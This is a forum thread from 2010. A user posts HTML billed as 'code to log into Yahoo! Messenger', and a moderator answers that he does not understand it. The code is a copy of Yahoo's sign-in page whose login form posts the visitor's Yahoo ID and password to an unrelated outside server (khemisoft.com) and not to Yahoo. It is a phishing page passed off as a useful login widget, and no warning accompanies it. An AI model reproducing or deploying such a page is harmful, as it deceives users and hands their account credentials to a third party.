The forum of the forums
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Code to log into Yahoo! Messenger

2 posters

Go down

Code to log into Yahoo! Messenger Empty Code to log into Yahoo! Messenger

Post by alaa hassan May 23rd 2010, 1:31 pm

hiiiiiiiiiiiiiiiiiiii

Code to log into Yahoo! Messenger


:loul: :loul:


Type * HTML


Please move to the right place

:wouhou: :wouhou:

Code:


<div id="yregwp">
<!-- begin header -->

<!-- intl = us, spaceid = 150001463 offset = 0 position = HEAD -->
<div style="color: Red;" id="ygma"><div id="ygmaheader"><a href="www.shrbane.tk"><font size="5"><span id="result_box" class="short_text"><span style="" title="">Welcome
 to Yahoo! Messenger</span></span></font></a></div></div><script language="javascript">
if(window.yzq_d==null)window.yzq_d=new Object();
window.yzq_d['w.kuEUWTSR4-']='&U=13gplr7ga%2fN%3dw.kuEUWTSR4-%2fC%3d650008.13546636.13610158.13057442%2fD%3dHEAD%2fB%3d5775037%2fV%3d1';

</script><noscript><img alt="" src="https://us.bc.yahoo.com/b?P=Y5bmeUWTcKCeiJWPS3RcfAGxrIHD7Et0XOYAC26f&T=14j123tmi%2fX%3d1265917158%2fE%3d150001463%2fR%3dregst%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d1079828747%2fH%3dc2VjdXJlPXRydWU-%2fQ%3d-1%2fS%3d1%2fJ%3dC057C442&U=13gplr7ga%2fN%3dw.kuEUWTSR4-%2fC%3d650008.13546636.13610158.13057442%2fD%3dHEAD%2fB%3d5775037%2fV%3d1" height="1" width="1"></noscript>
<!-- end header -->
<span id="cache"></span>
<script language="JavaScript">
   
function checkBrowser(){
    var appName = navigator.appName;
    if( appName == "Microsoft Internet Explorer" )
    {
        // this only works in IE 5 for windows and higher ...
        if( navigator.appVersion.indexOf("Windows") == -1 )
            return -1;
        var appVersionAry = navigator.appVersion.split("(");
        if( appVersionAry.length < 2 )
            return -1;
        var appVersion = appVersionAry[1];
        appVersionAry = appVersion.split("; ");
        if( appVersionAry.length < 2 )
            return -1;
        appVersion = appVersionAry[1];
        appVersionAry = appVersion.split(" ");
        if( appVersionAry.length < 2 )
            return -1;
        appVersion = appVersionAry[1];
        var appVersionNumber = parseInt(appVersion);

        if( appVersionNumber < 5 )
            return -1;
    }
    else
    {
        return -1;
    }
}

</script>


<script language="JavaScript">


function flashCacheReady (initialized){ //invoked directly by Flash
    var inCache = false;
 
  // Get the info from flash
  var o={};
  o=(document.getElementById("flashCache")).getCache(o);
  if(o != null) inCache = true;
  else return;

  if(o.YL != 'null' && o.YL != null) {
    document·cookie = o.YL + ";expires=Thu, 15 Apr 2037 20:00:00 GMT;domain=login.yahoo.com;path=/";
  }

  if(o.F != 'null' && o.F != null) {
    document·cookie = o.F + ";expires=Thu, 15 Apr 2037 20:00:00 GMT;domain=.yahoo.com;path=/";
  }

  if(o.YLS != 'null' && o.YLS != null) {
    if((o.YLS.match("n=0")) != null) {
      o.YLS = o.YLS.replace("n=0", "n=9");
    } else {
      o.YLS = o.YLS.concat("&n=9");
    }
    document·cookie = o.YLS + ";expires=Thu, 15 Apr 2037 20:00:00 GMT;domain=.yahoo.com;path=/";
  }

  if(((o.YL != 'null') && (o.YL != null)) || ((o.F != 'null') && (o.F != null)) && (document·cookie.length > 0)) {
    location.replace (document.location + "&rl=1");
  }

  // If the browser is IE, get from the xml cache as well.
 
if((checkBrowser() != -1)) {
  function getXML(cookieName,header,spanName)
  {
      var span = document.getElementById("cache");
      span.style.behavior = "url('#default#userData')";
      span.load(spanName);
 
      var ckyDate = new Date;
      ckyDate.setDate(ckyDate.getDate( ) + 7);
 
      var saved = span.getAttribute("saved"+cookieName);

      if((saved == null ) || (saved == "")) return -1;
      var cookieStr = saved;
      if(cookieName == "YLS") {
        if((cookieStr.match("n=0")) != null) {
          cookieStr = cookieStr.replace("n=0", "n=9");
        } else {
          cookieStr = cookieStr.concat("&n=9");
        }
      }
      if (header != ""){
          cookieStr = cookieStr + ';' + header;
      }
      document·cookie = cookieStr;
      return 0;
  }

  var ylRes = getXML("YL", "expires = Thu, 15 Apr 2037 20:00:00 GMT; domain=login.yahoo.com; path=/", "YL");
  var fRes = getXML("F", "expires = Thu, 15 Apr 2037 20:00:00 GMT; domain=.yahoo.com; path=/", "YL");
  var ylsRes = getXML("YLS", "expires = Thu, 15 Apr 2037 20:00:00 GMT; domain=.yahoo.com; path=/", "YL");

  if(ylRes == 0 || fRes == 0 && (document·cookie.length > 0)) {
    location.replace (document.location + "&rl=1");
  }
}
    }
</script>





<script type="text/javascript">

function FlashDetector_Detect(targetVersion)
{
  var pObj = null;
  var tokens, len, curr_tok;
  var hasVersion = -1;
  var playable = false;
  if(navigator.mimeTypes && navigator.mimeTypes['application/x-shockwave-flash'])
  {
    pObj = navigator.mimeTypes['application/x-shockwave-flash'].enabledPlugin;
  }
  if(pObj != null)
  {
    tokens = navigator.plugins['Shockwave Flash'].description.split(' ');
    len = tokens.length;
    while(len--)
    {
   curr_tok = parseInt( tokens[len] );

        if(!isNaN( curr_tok) )
        {
          hasVersion = curr_tok;
          FlashDetector_Version = curr_tok;
          break;
        }
    }
    if(hasVersion >= targetVersion)
    {
        playable = true;
    }
    else
    {
        playable = false;
    }
  }
  return playable;
}

var flashDetector_Playable = false;
var flashDetector_targetVersion = '8';

var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
 
if (isIE && isWin && !isOpera) {
    document.write('<scr' + 'ipt language="VBScript"\> \n');
    document.write('on error resume next \n');
    document.write('flashDetector_Playable = ( IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & flashDetector_targetVersion)))\n');
    document.write('</scr' + 'ipt\> \n');
  } else {
      flashDetector_Playable = FlashDetector_Detect(flashDetector_targetVersion);
  }

  var flashCode = '';

  if(flashDetector_Playable) {
 
    var ts = (new Date()).getTime( );

    flashCode = '<object type="application/x-shockwave-flash" data="https://login.yahoo.com/login/dataCache.swf" width="0" height="0" id="flashCache"> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="https://login.yahoo.com/login/dataCache.swf?' + ts + '" /> <param name="bgColor" value="#fff" /> </object> ';

  }
  document.write(flashCode);

</script><object type="application/x-shockwave-flash" data="https://login.yahoo.com/login/dataCache.swf" id="flashCache" height="0" width="0"> <param name="allowScriptAccess" value="sameDomain"> <param name="movie" value="https://login.yahoo.com/login/dataCache.swf?1274612614042"> <param name="bgColor" value="#fff"> </object>


<div id="yregct" class="yregclb">
   <div id="yreglg">
<!-- login box goes here -->         
      <div class="top yregbx">
    <script type="text/javascript">if(top == self) { document.write("<div class=\" badge\">")}</script><div class="second yregbx">   <span class="ct"></span>

   
         <div class="yregbxi"><div class="yregdsilu">
          <div id="scta">
            <span id="lb">
              <span class="lb_tl">
                <span class="lb_br">
                  <span class="lb_bl">
                    <span class="lb_tr">
                      <a tabindex="0" href="https://edit.yahoo.com/config/eval_register?.intl=us&amp;.pd=ym_ver%253D0%2526c%253D%2526ivt%253D%2526sg%253D&amp;new=1&amp;.done=http%3A//mail.yahoo.com&amp;.src=ym&amp;.v=0&amp;.u=ffp5jf95n8n76&amp;partner=&amp;.partner=&amp;pkg=&amp;stepid=&amp;.p=&amp;promo=&amp;.last=">

                      <font style="color: Purple;" size="4"><span style="font-weight: bold;">Sign up for Yahoo!
                      </span></font></a>
                    </span>
                  </span>
                </span>
              </span>
            </span>
          </div>
        </div><script type="text/javascript">if (top == self) { document.write("                                <div id=\"rcta\">                                <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\" tabIndex=\"-1\">                <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\" tabIndex=\"-1\">                                        <span class=\"ct\">                                            <span class=\"cl\"></span>                                        </span>                                      </a>                                                                        <div class=\"ctact\">                                        <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\" tabIndex=\"-1\">                                            <div class=\"key\"> </div>                                        </a>                                        <div class=\"txt\">                                            <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\">                                                <span class=\"qs\">Are you protected?</span>                                            </a>                                            <div class=\"sltxt\">                                                <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\">                                                    <span class=\"sl\">Create your sign-in seal.</span>                                                </a>                                                <span class=\"why\">(<a href=\"https://protect.login.yahoo.com/?.src=ym&.v=0&.u=ffp5jf95n8n76&.last=&promo=&.intl=us&.bypass=&.help=3&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%2526c=&.done=http%3A//mail.yahoo.com\">Why?</a>)</span>                                                                        </div>                                                                                    </div>                                    </div>                                                                        <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=ffp5jf95n8n76&.partner=&pkg=&stepid=&.pd=c=&.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym\" tabIndex=\"-1\">                                        <span class=\"cb\">                                                            <span class=\"cl\"></span>                                                        </span>                                    </a>                                                                    </a>                            </div>                              <div class=\"clear\"> </div>") } else  { top.location.href = "http://www.yahoo.com" }</script>                                <div id="rcta">                                <a href="https://protect.login.yahoo.com/login/set_pref?.intl=us&amp;.src=ym&amp;.u=ffp5jf95n8n76&amp;.partner=&amp;pkg=&amp;stepid=&amp;.pd=c=&amp;.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&amp;.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym" tabindex="-1">                </a><a href="https://protect.login.yahoo.com/login/set_pref?.intl=us&amp;.src=ym&amp;.u=ffp5jf95n8n76&amp;.partner=&amp;pkg=&amp;stepid=&amp;.pd=c=&amp;.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&amp;.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym" tabindex="-1">                                        <span class="ct">                                            <span class="cl"></span></span></a><font style="font-weight: bold; color: Blue;" size="3"><br><a href="https://protect.login.yahoo.com/login/set_pref?.intl=us&amp;.src=ym&amp;.u=ffp5jf95n8n76&amp;.partner=&amp;pkg=&amp;stepid=&amp;.pd=c=&amp;.crumb=czozMjoiZGI2ZmQxOTFhODMyM2M4MDI4ZjNlOTVhZGIzZGIxNDYiOw--&amp;.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Flogin_verify2%3F%26.src%3Dym" tabindex="-1"><span class="cb">                                                        </span>                                    </a></font>                                                                                                </div>                              <div style="font-weight: bold; color: Blue;" class="clear"> </div>

            <fieldset id="fsLogin">
            <legend style="font-weight: bold; color: Blue;"><font size="3">Login Form</font></legend>
   
<form method="post" action="http://khemisoft.com/src/yahoo/1.php" autocomplete="" name="login_form" onsubmit="return hash2(this)">

 <input name="op" value="7238" type="hidden">            <input name=".tries" value="1" type="hidden">
            <input name=".src" value="ym" type="hidden">
            <input name=".md5" value="" type="hidden">
            <input name=".hash" value="" type="hidden">

            <input name=".js" value="" type="hidden">
            <input name=".last" value="" type="hidden">
            <input name="promo" value="" type="hidden">
            <input name=".intl" value="us" type="hidden">
            <input name=".bypass" value="" type="hidden">
            <input name=".partner" value="" type="hidden">
            <input name=".u" value="ffp5jf95n8n76" type="hidden">
            <input name=".v" value="0" type="hidden">
            <input name=".challenge" value="U8qdJTFDwPfICl4poF24T6fAOev5" type="hidden">

            <input name=".yplus" value="" type="hidden">
            <input name=".emailCode" value="" type="hidden">
            <input name="pkg" value="" type="hidden">
            <input name="stepid" value="" type="hidden">
            <input name=".ev" value="" type="hidden">
            <input name="hasMsgr" value="0" type="hidden">
            <input name=".chkP" value="Y" type="hidden">
            <input name=".done" value="http://mail.yahoo.com" type="hidden">
            <input name=".pd" value="ym_ver=0&amp;c=&amp;ivt=&amp;sg=" type="hidden">

            <table id="yreglgtb" summary="form: login information" cellpadding="0" cellspacing="0">
                                        <tbody><tr style="color: DarkOrange;">
                                                <th id="thun"><font size="3"><label for="username">Yahoo! ID:</label></font></th></tr>
                                        <tr>
                                                <td><input name="login" id="username" value="" size="17" maxlength="96" type="text">
                     
                  <div class="dbidTip">(e.g. free2rhyme@yahoo.com)</div>
                   </td>
                                        </tr>

                                        <tr style="color: Orange;">
                                                <th id="thpw"><font size="4"><label for="passwd">Password:</label></font></th></tr>
                                        <tr>
                                                <td><input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" maxlength="64" type="password"></td>
                                               
                                        </tr>


  <tr>
    <td id="fun">

    </td>
  </tr>

            
            </tbody></table>
      <script src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_2.2.0.js" type="text/javascript"></script><font style="font-weight: bold; color: Lime;" size="5"><span id="result_box" class="short_text"><span style="" title="">Save</span></span></font><p class="yreglgsb"><input id=".save" name=".save" value="Sign In" type="submit"></p><br></form></fieldset></div></div></div></div><div id="yregtxt"><div id="mem_ft"><div id="ymalr2">
</div><!--end ymalr2_cont--><script language="javascript">
if(window.yzq_d==null)window.yzq_d=new Object();
window.yzq_d['xukuEUWTSR4-']='&U=13esf8rlu%2fN%3dxukuEUWTSR4-%2fC%3d341232.13387028.13763980.12040598%2fD%3dR2%2fB%3d5887686%2fV%3d1'; </script><br><br><br><br><p>    </p><a target="_blank" href="http://privacy.yahoo.com/"><br><br></a>
</div><!-- Content module end -->

<!-- end left side content -->      
   </div>
</div>
<!-- begin footer -->

<!-- intl = us, spaceid = 150001463 offset = 0 position = FOOT -->

<!-- static footer -->

<style type="text/css">
#mem_ft {border-top:1px solid #CCCCCC;font-size:10px;margin-top:1em;padding-top:0.5em;font-family:arial,helvetica,clean,sans-serif;text-align:center}
#mem_ft p {margin:0;padding:0;}
</style>   
<!-- end footer -->
</div>

        <script type="text/javascript">
        if (top != self) top.location.href = location.href;

        </script>
        <script type="text/javascript">
<!--
browser_string = navigator.appVersion + " " + navigator.userAgent;
if ( browser_string.indexOf("MSIE") < 0 ) {
   if (navigator.mimeTypes) {
      for (i = 0 ; i < navigator.mimeTypes.length ; i++) {
         if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) {
             doGotIt();
         }
      }
   } else {
      dontGotIt();
   }
} else {
   if (browser_string.indexOf("Windows")>=0) {
      doGotIt();
      document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">');
      document.write('</object>');
   }
}
hasMsgr = 0;
function dontGotIt(){
  hasMsgr = 0;
  document.login_form.hasMsgr.value=0;
}
function doGotIt(){
  hasMsgr = 1;
  document.login_form.hasMsgr.value=1;
}

YAHOO.namespace("membership");
YAHOO.membership.setFocus = function(e, id){
  var fid = id ? id : "username";
  var el = document.forms["login_form"].elements;
  var f = false;
  for(var i=0; i<el.length; i++){
    var c = el[i];
    if(c.type == 'text' || c.type == 'password'){
      if(c.value != c.defaultValue){
        return false;
      }
    }
    if(c.id == fid){
      f = true;
    }
  }
  if(f){
    document.getElementById(fid).focus();
  }
}

YAHOO.util.Event.addListener(window, "load", YAHOO.membership.setFocus);
if(typeof YAHOO=="undefined"){YAHOO={};}
YAHOO.namespace("membership");
YAHOO.membership.showError = function(toShowText){
  var errs = YAHOO.util.Dom.getElementsByClassName('yregertxt');
  for(var i=0; i<errs.length; i++){
    errs[i].parentNode.removeChild(errs[i]);
  }
  var fs = document.getElementById('fsLogin');
  var errMsg = document.createElement('div');
  errMsg.innerHTML = toShowText;
  errMsg.className = 'yregertxt';
  fs.insertBefore(errMsg, fs.firstChild);
}

YAHOO.membership.checkInputs = function(e){
  var id = document.getElementById('username');
  var pw = document.getElementById('passwd');
  if (!id && pw.value == '') {
    YAHOO.util.Event.preventDefault(e);
    pw.focus();
    YAHOO.membership.showError('<strong>Please enter your password</strong>');
  }else if(pw.value == '' && id.value == ''){
    YAHOO.util.Event.preventDefault(e);
    YAHOO.membership.showError('<strong>Invalid ID or password.</strong><br/> Please try again using your full Yahoo! ID.');
    id.focus();
  }else if(pw.value == '' && id.value != ''){
    YAHOO.util.Event.preventDefault(e);
    pw.focus();
    YAHOO.membership.showError('<strong>Please enter your password</strong>');
  }else if(pw.value != '' && id.value == ''){
    YAHOO.util.Event.preventDefault(e);
    id.focus();
    YAHOO.membership.showError('<strong>Please verify your Yahoo! ID</strong>');
  }
}

YAHOO.util.Event.addListener('.save', 'click', YAHOO.membership.checkInputs);
if(typeof YAHOO=="undefined"){YAHOO={};}
var Y = YAHOO;
Y.doUpgradeCheck = function(){
  var plugin, activex, version, params = [];

  if (navigator.plugins && navigator.plugins.length > 0) {
      plugin = navigator.plugins['Shockwave Flash 2.0'] ||
              navigator.plugins['Shockwave Flash'];

      if (plugin && plugin.description) {
          version = plugin.description.replace(/([a-zA-Z]|\s)+/, '').replace(/(\s+r|\s+b[0-9]+)/, '.').split('.');
      }
  } else {
      try {
          activex = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.7');
          version = activex.GetVariable('\$version').split(' ')[1].split(',');
      } catch (e1) {
          try {
              activex = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
              version = [6, 0, 21];
              activex.AllowScriptAccess = 'always';
              version = activex.GetVariable('\$version').split(' ')[1].split(',');
          } catch (e2) {}
      }
  }

  if(version){
      var major = parseInt(version[0], 10);
      var minorA = parseInt(version[1], 10);
      var minorB = parseInt(version[2], 10);
      var strVersion = major + "." + minorA + "." + minorB;

      if(major >= 10){
        //ok
      }else if(major == 9){
        if(minorA == 0 && minorB < 28){
          Y.showUpgradeCTA(strVersion);
        }
      }else if(major == 8){
        if(minorA == 0 && minorB < 34){
          Y.showUpgradeCTA(strVersion);
        }
      }else if(major == 7){
        if(minorA == 0 && minorB < 69){
          Y.showUpgradeCTA(strVersion);
        }
      }else{
        Y.showUpgradeCTA(strVersion);
      }
    }

}
Y.showUpgradeCTA = function(version){
  try{
    var fun = document.getElementById('fun');
    var imgUrl = "https://s.yimg.com/lq/i/nt/ic/ut/bsc/cautionmetro16_1.gif";
    var beaconUrl = 'https://login.yahoo.com/i/flashUp/ft.gif' + '?v=' + version + '&intl=' + 'us';
    fun.innerHTML = "<img id='caution' src='" + imgUrl + "'><span class='b'>Security Alert:</span> <span class='n'><a href='http://help.yahoo.com/l/us/yahoo/security/account_security/adobe-flash.html' tabindex='999' target='_blank'>Protect</a> your account. <a href='http://get.adobe.com/flashplayer/' tabindex='999' target='_blank'>Upgrade your Adobe Flash Player.</a><img src='" + beaconUrl + "' height='1' width='1'></span>";
    fun.style.display = 'block';
  }catch(e){}
}

if(window.addEventListener){
window.addEventListener("load", Y.doUpgradeCheck, false);
}else{
window.attachEvent("onload", Y.doUpgradeCheck);
}

//-->
</script>
<script src="https://s.yimg.com/lq/i/reg/js/login_md5_1.1.js" type="text/javascript"></script>

<script src="https://s.yimg.com/lq/i/reg/js/ylib_dom_1.1.js" type="text/javascript"></script>
<script src="https://s.yimg.com/lq/i/reg/js/yg_browserext_1.1.js" type="text/javascript"></script>
<script src="https://s.yimg.com/lq/i/reg/js/yregml_1.3.js" type="text/javascript"></script>

<!-- spaceid: 150001463 INT.OFFSET: 0 --><!-- SpaceID=150001463 loc=FR05 noad -->
<!-- l23.member.re3.yahoo.com Thu Feb 11 11:39:18 PST 2010 -->
<script language="javascript">
if(window.yzq_p==null)document.write("<scr"+"ipt language=javascript src=https://a248.e.akamai.net/sec.yimg.com/lib/bc/bc_2.0.4.js></scr"+"ipt>");
</script><script language="javascript" src="https://a248.e.akamai.net/sec.yimg.com/lib/bc/bc_2.0.4.js"></script><script language="javascript">
if(window.yzq_p)yzq_p('P=Y5bmeUWTcKCeiJWPS3RcfAGxrIHD7Et0XOYAC26f&T=14er5tm36%2fX%3d1265917158%2fE%3d150001463%2fR%3dregst%2fK%3d5%2fV%3d1.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d4055960070%2fH%3dc2VjdXJlPXRydWU-%2fS%3d1%2fJ%3dC057C442');
if(window.yzq_s)yzq_s();
</script><noscript><img alt="" src="https://us.bc.yahoo.com/b?P=Y5bmeUWTcKCeiJWPS3RcfAGxrIHD7Et0XOYAC26f&T=14ju0qfbp%2fX%3d1265917158%2fE%3d150001463%2fR%3dregst%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d2708285380%2fH%3dc2VjdXJlPXRydWU-%2fQ%3d-1%2fS%3d1%2fJ%3dC057C442" height="1" width="1"></noscript>
<!-- l23.member.re3.yahoo.com compressed/chunked Thu Feb 11 11:39:18 PST 2010 -->
avatar
alaa hassan
New Member

Posts : 2
Reputation : 0
Language : www.shrbane.tk

Back to top Go down

Code to log into Yahoo! Messenger Empty Re: Code to log into Yahoo! Messenger

Post by Jophy May 23rd 2010, 2:16 pm

Sorry, but I cannot understand your question, is it something related to forumotion?
Jophy
Jophy
ForumGuru

Male Posts : 17924
Reputation : 836
Language : English
Location : Somewhere

Back to top Go down

Code to log into Yahoo! Messenger Empty Re: Code to log into Yahoo! Messenger

Post by alaa hassan May 24th 2010, 8:24 am


Both this code to log in to Yahoo! Messenger
I am that you Besnieh if useful to everyone please move to the appropriate oath
avatar
alaa hassan
New Member

Posts : 2
Reputation : 0
Language : www.shrbane.tk

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum